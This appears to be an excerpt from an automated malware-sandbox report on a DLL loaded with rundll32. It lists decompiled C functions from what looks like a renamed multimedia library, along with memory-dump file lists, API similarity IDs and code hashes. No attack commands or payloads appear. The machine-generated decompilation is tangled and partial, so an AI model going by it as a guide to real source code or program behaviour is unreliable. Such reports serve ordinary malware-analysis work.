                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Console$getenv$AttributeText$BufferHandleInfoModeScreenWrite
                                                                      • String ID: 256color
                                                                      • API String ID: 1581660180-717642456
                                                                      • Opcode ID: b3342b7d85a04b310def07ad1c1987400b6fe5cb5a4dd7535e95db26552900fd
                                                                      • Instruction ID: 236701e196a9f5f0b8e09ae7c06ec1091ad9f70c104838dff11f3c92fdddfe69
                                                                      • Opcode Fuzzy Hash: b3342b7d85a04b310def07ad1c1987400b6fe5cb5a4dd7535e95db26552900fd
                                                                      • Instruction Fuzzy Hash: 2A715D74908755CBD710EF28988412EBBE1FF88351F918A2EECDA97390E779D840CB56
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 35%
                                                                      			E1001A460(signed char __eax) {
                                                                      				void* __ebx;
                                                                      				void* __esi;
                                                                      				void* _t68;
                                                                      				intOrPtr _t74;
                                                                      				signed char _t79;
                                                                      				signed char _t82;
                                                                      				char* _t83;
                                                                      				intOrPtr _t85;
                                                                      				signed int _t86;
                                                                      				signed int _t89;
                                                                      				intOrPtr _t90;
                                                                      				signed int _t92;
                                                                      				signed int _t94;
                                                                      				intOrPtr _t95;
                                                                      				intOrPtr _t96;
                                                                      				intOrPtr* _t98;
                                                                      				void* _t99;
                                                                      				intOrPtr* _t100;
                                                                      
                                                                      				_t79 = __eax;
                                                                      				_t100 = _t99 - 0x1c;
                                                                      				if( *((intOrPtr*)(__eax + 0xe4)) > 0) {
                                                                      					_t89 = 0;
                                                                      					do {
                                                                      						_t98 =  *((intOrPtr*)(__eax + 0xe0)) + _t89 * 4;
                                                                      						_t89 = _t89 + 1;
                                                                      						_t95 =  *_t98;
                                                                      						_t96 = _t95 + 0xc;
                                                                      						 *_t100 = _t95 + 0x10;
                                                                      						E1000A000(__eax, _t96);
                                                                      						 *_t100 = _t96;
                                                                      						L10011CC0();
                                                                      						 *_t100 = _t98;
                                                                      						E100290E0();
                                                                      					} while (_t89 <  *((intOrPtr*)(_t79 + 0xe4)));
                                                                      				}
                                                                      				_t90 = _t79 + 0xb8;
                                                                      				 *((intOrPtr*)(_t79 + 0xe4)) = 0;
                                                                      				 *_t100 = _t79 + 0xe0;
                                                                      				_t85 = _t79 + 0xd8;
                                                                      				E100290E0();
                                                                      				do {
                                                                      					 *_t100 = _t90;
                                                                      					_t90 = _t90 + 4;
                                                                      					E1000A000(_t79, _t90);
                                                                      				} while (_t85 != _t90);
                                                                      				if( *((intOrPtr*)(_t79 + 0xdc)) > 0) {
                                                                      					_t94 = 0;
                                                                      					do {
                                                                      						_t74 =  *((intOrPtr*)(_t79 + 0xd8)) + _t94 * 4;
                                                                      						_t94 = _t94 + 1;
                                                                      						 *_t100 = _t74;
                                                                      						E1000A000(_t79, _t94);
                                                                      					} while (_t94 <  *((intOrPtr*)(_t79 + 0xdc)));
                                                                      				}
                                                                      				 *_t100 = _t85;
                                                                      				E100290E0();
                                                                      				 *_t100 = _t79 + 0x118;
                                                                      				L10011CC0();
                                                                      				 *_t100 = _t79 + 0x128;
                                                                      				E1000A000(_t79, _t90);
                                                                      				 *_t100 = _t79 + 0x12c;
                                                                      				E1000A000(_t79, _t90);
                                                                      				 *_t100 = _t79 + 0x140;
                                                                      				E1000A000(_t79, _t90);
                                                                      				if( *(_t79 + 0x40) != _t79) {
                                                                      					 *_t100 = _t79 + 0x40;
                                                                      					E100290E0();
                                                                      				}
                                                                      				_t86 = 0x168;
                                                                      				 *_t100 = _t79 + 0x148;
                                                                      				E1000D270();
                                                                      				_t82 = _t79;
                                                                      				if((_t79 & 0x00000001) != 0) {
                                                                      					 *_t79 = 0;
                                                                      					_t82 = _t79 + 1;
                                                                      					_t86 = 0x167;
                                                                      					if((_t82 & 0x00000002) == 0) {
                                                                      						goto L12;
                                                                      					} else {
                                                                      						goto L20;
                                                                      					}
                                                                      					L14:
                                                                      					_t83 = _t82 + _t68;
                                                                      					if((_t86 & 0x00000004) != 0) {
                                                                      						 *_t83 = 0;
                                                                      						_t83 = _t83 + 4;
                                                                      					}
                                                                      					if((_t86 & 0x00000002) != 0) {
                                                                      						 *_t83 = 0;
                                                                      						_t83 = _t83 + 2;
                                                                      					}
                                                                      					if((_t86 & 0x00000001) != 0) {
                                                                      						 *_t83 = 0;
                                                                      					}
                                                                      					 *((intOrPtr*)(_t79 + 0x100)) = 0;
                                                                      					 *((intOrPtr*)(_t79 + 0xf4)) = 2;
                                                                      					 *((intOrPtr*)(_t79 + 0x70)) = 0;
                                                                      					 *((intOrPtr*)(_t79 + 0x74)) = 0x80000000;
                                                                      					 *((intOrPtr*)(_t79 + 0x68)) = 0;
                                                                      					 *((intOrPtr*)(_t79 + 0x6c)) = 0x80000000;
                                                                      					 *((intOrPtr*)(_t79 + 0x104)) = 0x80000000;
                                                                      					 *((intOrPtr*)(_t79 + 0x108)) = 0xffffffff;
                                                                      					 *((intOrPtr*)(_t79 + 0x10c)) = 0xffffffff;
                                                                      					 *((intOrPtr*)(_t79 + 0x124)) = 0xffffffff;
                                                                      					 *((intOrPtr*)(_t79 + 0x7c)) = 1;
                                                                      					 *((intOrPtr*)(_t79 + 0x54)) = 1;
                                                                      					 *((intOrPtr*)(_t79 + 0x60)) = 1;
                                                                      					 *((intOrPtr*)(_t79 + 0x50)) = 0xffffffff;
                                                                      					 *(_t79 + 0x40) = _t79;
                                                                      					 *((intOrPtr*)(_t79 + 0xf0)) = 2;
                                                                      					 *((intOrPtr*)(_t79 + 0xf8)) = 2;
                                                                      					return 2;
                                                                      				} else {
                                                                      					if((_t82 & 0x00000002) != 0) {
                                                                      						L20:
                                                                      						 *_t82 = 0;
                                                                      						_t86 = _t86 - 2;
                                                                      						_t82 = _t82 + 2;
                                                                      					}
                                                                      				}
                                                                      				L12:
                                                                      				_t68 = 0;
                                                                      				_t92 = _t86 & 0xfffffff8;
                                                                      				do {
                                                                      					 *((intOrPtr*)(_t82 + _t68)) = 0;
                                                                      					 *((intOrPtr*)(_t82 + _t68 + 4)) = 0;
                                                                      					_t68 = _t68 + 8;
                                                                      				} while (_t68 < _t92);
                                                                      				goto L14;
                                                                      			}





















                                                                      0x1001a624
                                                                      0x1001a62a
                                                                      0x1001a630
                                                                      0x1001a637
                                                                      0x1001a63e
                                                                      0x1001a645
                                                                      0x1001a64c
                                                                      0x1001a64f
                                                                      0x1001a655
                                                                      0x1001a662
                                                                      0x1001a58a
                                                                      0x1001a58d
                                                                      0x1001a680
                                                                      0x1001a680
                                                                      0x1001a685
                                                                      0x1001a688
                                                                      0x1001a688
                                                                      0x1001a58d
                                                                      0x1001a593
                                                                      0x1001a595
                                                                      0x1001a597
                                                                      0x1001a59a
                                                                      0x1001a59a
                                                                      0x1001a59d
                                                                      0x1001a5a1
                                                                      0x1001a5a4
                                                                      0x00000000

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_buffer_unref$mv_freep$mv_dict_free$mv_channel_layout_uninit
                                                                      • String ID:
                                                                      • API String ID: 1735483532-0
                                                                      • Opcode ID: b1f051f397a595c89fd00aa7c4bdbf0e8165c123e935fbb0ada5b3fbc138a149
                                                                      • Instruction ID: e5137f4a5bc7018b3bf66a3982d40490682209c4fe07239027ca6129b2817d8d
                                                                      • Opcode Fuzzy Hash: b1f051f397a595c89fd00aa7c4bdbf0e8165c123e935fbb0ada5b3fbc138a149
                                                                      • Instruction Fuzzy Hash: 66516BB19046068BDB10DF28C48178A77E5FF45364F0A46BADC989F38AD774E8C5CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: memcmpstrlen
                                                                      • String ID: mono
                                                                      • API String ID: 3108337309-2381334079
                                                                      • Opcode ID: 961e4d7430c6ee58c8d49aecf6a6276b133ce91f2d562b03286109f610fa6c8a
                                                                      • Instruction ID: 18b6b574f71558c9a9b0b92199a84ecc10b2be927aad7e864a8dbdfaab720d03
                                                                      • Opcode Fuzzy Hash: 961e4d7430c6ee58c8d49aecf6a6276b133ce91f2d562b03286109f610fa6c8a
                                                                      • Instruction Fuzzy Hash: 62713A74A083598FD354DF25C48491EBBE2FFC8384F51892DE88997319DB34E9458F86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • The hardware pixel format '%s' is not supported by the device type '%s', xrefs: 1001EA03
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_get_pix_fmt_namemv_log
                                                                      • String ID: The hardware pixel format '%s' is not supported by the device type '%s'
                                                                      • API String ID: 3418758923-379977042
                                                                      • Opcode ID: 9b272a863b8c87bc50828a51ff6e70bc1a94dffcb6cd8086de82a19a6494632f
                                                                      • Instruction ID: a270e7ec8c0c912217b56fd727a34e093eb2c836343d1efa160e437917b73519
                                                                      • Opcode Fuzzy Hash: 9b272a863b8c87bc50828a51ff6e70bc1a94dffcb6cd8086de82a19a6494632f
                                                                      • Instruction Fuzzy Hash: 9F61B3746087858FD750DF69C480A0EF7E5FF88354F568A6DE998DB311E670EC818B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_mallocz$mv_realloc$mv_freep
                                                                      • String ID:
                                                                      • API String ID: 3944475926-0
                                                                      • Opcode ID: a6fa4d2bae3b4a2bda0a35254eb544c858f4501f780d02fc74c31e633d2e6906
                                                                      • Instruction ID: 0671ab7339bb216cd2d01b0f004d479de4b058bf66c6df6044412f8339b3df2e
                                                                      • Opcode Fuzzy Hash: a6fa4d2bae3b4a2bda0a35254eb544c858f4501f780d02fc74c31e633d2e6906
                                                                      • Instruction Fuzzy Hash: 937104B48087018FE714DF25C18471AFBE0FF86380F568A6DE9898B365D775E980CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 45%
                                                                      			E1001E690(intOrPtr _a4, char _a8) {
                                                                      				char _v16;
                                                                      				intOrPtr _v32;
                                                                      				intOrPtr _v48;
                                                                      				char* _v52;
                                                                      				char _v56;
                                                                      				void* __ebx;
                                                                      				void* __esi;
                                                                      				intOrPtr _t37;
                                                                      				intOrPtr _t38;
                                                                      				intOrPtr _t39;
                                                                      				intOrPtr _t42;
                                                                      				intOrPtr _t45;
                                                                      				char _t46;
                                                                      				intOrPtr _t49;
                                                                      				char _t58;
                                                                      				intOrPtr* _t63;
                                                                      				intOrPtr _t64;
                                                                      				intOrPtr _t70;
                                                                      				intOrPtr _t71;
                                                                      				void* _t72;
                                                                      				intOrPtr* _t73;
                                                                      
                                                                      				_t73 = _t72 - 0x34;
                                                                      				_t37 = _a4;
                                                                      				_t58 = _a8;
                                                                      				_t71 =  *((intOrPtr*)(_t37 + 4));
                                                                      				_t63 =  *((intOrPtr*)(_t71 + 4));
                                                                      				_t61 =  *((intOrPtr*)(_t63 + 0xc));
                                                                      				if( *((intOrPtr*)(_t63 + 0xc)) == 0) {
                                                                      					_t64 =  *_t63;
                                                                      					_t62 =  *((intOrPtr*)(_t64 + 0x3c));
                                                                      					if( *((intOrPtr*)(_t64 + 0x3c)) == 0) {
                                                                      						_t38 = 0xffffffd8;
                                                                      						goto L7;
                                                                      					} else {
                                                                      						if( *((intOrPtr*)(_t71 + 0x1c)) == 0) {
                                                                      							_t38 = 0xffffffea;
                                                                      							goto L7;
                                                                      						} else {
                                                                      							 *_t73 = _t37;
                                                                      							_t39 = L10009FC0(_t58, _t62);
                                                                      							 *((intOrPtr*)(_t58 + 0x128)) = _t39;
                                                                      							if(_t39 == 0) {
                                                                      								goto L6;
                                                                      							} else {
                                                                      								_v56 = _t58;
                                                                      								 *_t73 = _t71;
                                                                      								_t42 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t71 + 4)))) + 0x3c))();
                                                                      								if(_t42 < 0) {
                                                                      									_v32 = _t42;
                                                                      									 *_t73 = _t58 + 0x128;
                                                                      									E1000A000(_t58 + 0x128, _t71);
                                                                      									_t38 = _v32;
                                                                      									goto L7;
                                                                      								} else {
                                                                      									 *((intOrPtr*)(_t58 + 0x40)) = _t58;
                                                                      									return 0;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					 *((intOrPtr*)(_t58 + 0x50)) =  *((intOrPtr*)(_t71 + 0x24));
                                                                      					 *_t73 = _t37;
                                                                      					_t45 = L10009FC0(_t58, _t61);
                                                                      					 *((intOrPtr*)(_t58 + 0x128)) = _t45;
                                                                      					if(_t45 == 0) {
                                                                      						L6:
                                                                      						_t38 = 0xfffffff4;
                                                                      						goto L7;
                                                                      					} else {
                                                                      						_t46 = L1001AC40(_t58, _t70, _t71);
                                                                      						_v16 = _t46;
                                                                      						if(_t46 == 0) {
                                                                      							goto L6;
                                                                      						} else {
                                                                      							_v56 = _t46;
                                                                      							_v52 = 0;
                                                                      							 *_t73 =  *((intOrPtr*)( *((intOrPtr*)(_t71 + 4)) + 0xc));
                                                                      							_t49 = E1001E690();
                                                                      							if(_t49 < 0) {
                                                                      								L13:
                                                                      								_v32 = _t49;
                                                                      								 *_t73 =  &_v16;
                                                                      								L1001ADB0(_t58);
                                                                      								return _v32;
                                                                      							} else {
                                                                      								 *_t73 = _t58;
                                                                      								_v52 =  *((intOrPtr*)( *((intOrPtr*)(_t71 + 4)) + 0x10));
                                                                      								_v56 = _v16;
                                                                      								_t49 = E1001E450(_t58, _t70, _t71);
                                                                      								if(_t49 == 0) {
                                                                      									goto L13;
                                                                      								} else {
                                                                      									_v48 = _t49;
                                                                      									_v32 = _t49;
                                                                      									_v56 = 0x10;
                                                                      									_v52 = "Failed to map frame into derived frame context: %d.\n";
                                                                      									 *_t73 = _t71;
                                                                      									E10026560();
                                                                      									 *_t73 =  &_v16;
                                                                      									L1001ADB0("Failed to map frame into derived frame context: %d.\n");
                                                                      									_t38 = _v32;
                                                                      									L7:
                                                                      									return _t38;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      			}

                                                                      0x1001e719
                                                                      0x1001e722
                                                                      0x1001e72b
                                                                      0x1001e72f
                                                                      0x1001e733
                                                                      0x1001e736
                                                                      0x1001e73f
                                                                      0x1001e742
                                                                      0x1001e747
                                                                      0x1001e755
                                                                      0x1001e75a
                                                                      0x1001e75a
                                                                      0x1001e713
                                                                      0x1001e6f1
                                                                      0x1001e6d5
                                                                      0x1001e6c4

                                                                      APIs
                                                                      • mv_frame_alloc.F072(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E6CA
                                                                        • Part of subcall function 1001AC40: mv_malloc.F072 ref: 1001AC56
                                                                      • mv_hwframe_get_buffer.F072(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E6EA
                                                                        • Part of subcall function 1001E690: mv_hwframe_map.F072(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E70C
                                                                        • Part of subcall function 1001E690: mv_log.F072 ref: 1001E736
                                                                        • Part of subcall function 1001E690: mv_frame_free.F072 ref: 1001E742
                                                                      • mv_buffer_ref.F072(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E6B7
                                                                        • Part of subcall function 10009FC0: mv_mallocz.F072 ref: 10009FD2
                                                                      • mv_buffer_ref.F072(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E773
                                                                      Strings
                                                                      • Failed to map frame into derived frame context: %d., xrefs: 1001E71D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_buffer_ref$mv_frame_allocmv_frame_freemv_hwframe_get_buffermv_hwframe_mapmv_logmv_mallocmv_mallocz
                                                                      • String ID: Failed to map frame into derived frame context: %d.
                                                                      • API String ID: 2770197599-2491951210
                                                                      • Opcode ID: 9c42f20b11d269895efbb2d602614c3a18f3d43235624fe558127838406e54b0
                                                                      • Instruction ID: c8a7df340d6dcafb776f8cd3ae8b96b8e9686aa7a819e798d3a2729e9b2e2ff4
                                                                      • Opcode Fuzzy Hash: 9c42f20b11d269895efbb2d602614c3a18f3d43235624fe558127838406e54b0
                                                                      • Instruction Fuzzy Hash: 6541E5786097418FE740DF29D58095FBBE0FF88350F05896DE8998B355E734E8818B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ExclusiveLock$Releasemv_mallocz$Acquire
                                                                      • String ID:
                                                                      • API String ID: 2881747546-0
                                                                      • Opcode ID: e68bda1cf1dcc83a9c629bb4ba2d6cebfd630f8bebdd504c642d2b33e51082ff
                                                                      • Instruction ID: d1cc2579b1c102c58a024c2dc6685eb9d016c090d03debdddd743aed40a40bb7
                                                                      • Opcode Fuzzy Hash: e68bda1cf1dcc83a9c629bb4ba2d6cebfd630f8bebdd504c642d2b33e51082ff
                                                                      • Instruction Fuzzy Hash: 0C6126B49087058FE714DF25C48171BBBE1EF85380F12866DE8998B35ADB74E981CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E10092440() {
                                                                      				signed int _t63;
                                                                      				signed int _t64;
                                                                      				signed int _t65;
                                                                      				signed int _t66;
                                                                      				signed int _t68;
                                                                      				signed int _t69;
                                                                      				signed int _t71;
                                                                      				signed int _t84;
                                                                      				signed int _t87;
                                                                      				signed int _t88;
                                                                      				signed int _t89;
                                                                      				void* _t90;
                                                                      				signed int _t91;
                                                                      				void* _t97;
                                                                      				signed int _t120;
                                                                      				signed int _t121;
                                                                      				signed int _t122;
                                                                      				signed int _t125;
                                                                      				signed int _t126;
                                                                      				signed int _t128;
                                                                      				char* _t129;
                                                                      				void* _t131;
                                                                      				signed int* _t132;
                                                                      
                                                                      				_t132 = _t131 - 0x3c;
                                                                      				_t125 = _t132[0x14];
                                                                      				if(_t132[0x15] != 0) {
                                                                      					_t63 = _t132[0x15];
                                                                      					 *_t63 = _t125;
                                                                      				}
                                                                      				if(_t132[0x16] == 1) {
                                                                      					L29:
                                                                      					L100A0678();
                                                                      					 *_t63 = 0x21;
                                                                      					goto L30;
                                                                      				} else {
                                                                      					if(_t132[0x16] <= 0x24) {
                                                                      						while(1) {
                                                                      							_t65 =  *_t125;
                                                                      							 *_t132 = _t65;
                                                                      							_t87 = _t65;
                                                                      							L100A0738();
                                                                      							if(_t65 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t125 = _t125 + 1;
                                                                      						}
                                                                      						_t120 = _t87;
                                                                      						_t88 = _t65;
                                                                      						_t6 = _t120 - 0x2b; // -43
                                                                      						_t66 = _t120;
                                                                      						if((_t6 & 0x000000fd) == 0) {
                                                                      							_t66 =  *(_t125 + 1) & 0x000000ff;
                                                                      							_t125 = _t125 + 1;
                                                                      						}
                                                                      						if(_t132[0x16] != 0) {
                                                                      							if(_t132[0x16] != 0x10 || _t66 != 0x30) {
                                                                      								goto L11;
                                                                      							} else {
                                                                      								if(( *(_t125 + 1) & 0xdf) == 0x58) {
                                                                      									goto L34;
                                                                      								} else {
                                                                      									_t132[9] = 0x10;
                                                                      									_t129 = _t125 + 1;
                                                                      									_t68 = 0;
                                                                      									goto L16;
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							_t132[0x16] = 0xa;
                                                                      							if(_t66 == 0x30) {
                                                                      								if(( *(_t125 + 1) & 0xdf) != 0x58) {
                                                                      									_t132[9] = 8;
                                                                      									_t132[0x16] = 8;
                                                                      									goto L45;
                                                                      								} else {
                                                                      									L34:
                                                                      									_t66 =  *(_t125 + 2) & 0x000000ff;
                                                                      									_t132[0x16] = 0x10;
                                                                      									_t125 = _t125 + 2;
                                                                      									goto L11;
                                                                      								}
                                                                      							} else {
                                                                      								L11:
                                                                      								_t128 = _t66;
                                                                      								if(_t128 - 0x30 <= 9) {
                                                                      									_t132[9] = _t132[0x16];
                                                                      									L45:
                                                                      									_t68 = _t66 - 0x30;
                                                                      									goto L15;
                                                                      								} else {
                                                                      									 *_t132 = _t128;
                                                                      									L100A0740();
                                                                      									if(_t66 != 0) {
                                                                      										_t68 = _t128 - 0x37;
                                                                      										_t132[9] = _t132[0x16];
                                                                      										goto L15;
                                                                      									} else {
                                                                      										 *_t132 = _t128;
                                                                      										L100A0730();
                                                                      										if(_t66 == 0) {
                                                                      											L30:
                                                                      											_t64 = 0;
                                                                      											goto L31;
                                                                      										} else {
                                                                      											_t68 = _t128 - 0x57;
                                                                      											_t132[9] = _t132[0x16];
                                                                      											L15:
                                                                      											_t129 = _t125 + 1;
                                                                      											if(_t68 >= _t132[9]) {
                                                                      												goto L30;
                                                                      											} else {
                                                                      												L16:
                                                                      												_t69 = _t132[0x16];
                                                                      												_t132[0xa] = _t88;
                                                                      												_t126 = _t68;
                                                                      												_t132[6] = _t69;
                                                                      												_t132[7] = _t69 >> 0x1f;
                                                                      												_t71 = _t120;
                                                                      												_t121 = _t68 >> 0x1f;
                                                                      												_t132[0xb] = _t71;
                                                                      												while(1) {
                                                                      													_t89 =  *_t129;
                                                                      													_t35 = _t89 - 0x30; // -96
                                                                      													_t97 = _t35;
                                                                      													if(_t97 <= 9) {
                                                                      														goto L17;
                                                                      													}
                                                                      													 *_t132 = _t89;
                                                                      													L100A0740();
                                                                      													if(_t71 == 0) {
                                                                      														 *_t132 = _t89;
                                                                      														L100A0730();
                                                                      														if(_t71 != 0) {
                                                                      															_t90 = _t89 - 0x57;
                                                                      															goto L18;
                                                                      														}
                                                                      													} else {
                                                                      														_t90 = _t89 - 0x37;
                                                                      														L18:
                                                                      														if(_t90 < _t132[9]) {
                                                                      															 *_t132 = 0xffffffff;
                                                                      															_t132[1] = 0x7fffffff;
                                                                      															_t132[2] = _t132[6];
                                                                      															_t132[3] = _t132[7];
                                                                      															_t71 = L10091900() + 2;
                                                                      															asm("adc edx, 0x0");
                                                                      															asm("sbb edx, edi");
                                                                      															if(_t71 < _t126) {
                                                                      																_t132[0xa] = 1;
                                                                      															} else {
                                                                      																_t84 = _t126;
                                                                      																_t71 = _t84 * _t132[0x16];
                                                                      																_t121 = (_t84 * _t132[0x16] >> 0x20) + _t132[7] * _t126 + _t132[0x16] * _t121;
                                                                      																_t126 = _t71 + _t90;
                                                                      																asm("adc edi, ebx");
                                                                      															}
                                                                      															_t129 = _t129 + 1;
                                                                      															continue;
                                                                      														}
                                                                      													}
                                                                      													_t91 = _t132[0xa];
                                                                      													_t132[7] = _t121;
                                                                      													_t132[6] = _t126;
                                                                      													_t122 = _t132[0xb] & 0x000000ff;
                                                                      													if(_t132[0x15] != 0) {
                                                                      														 *(_t132[0x15]) = _t129;
                                                                      													}
                                                                      													if(_t122 == 0x2d) {
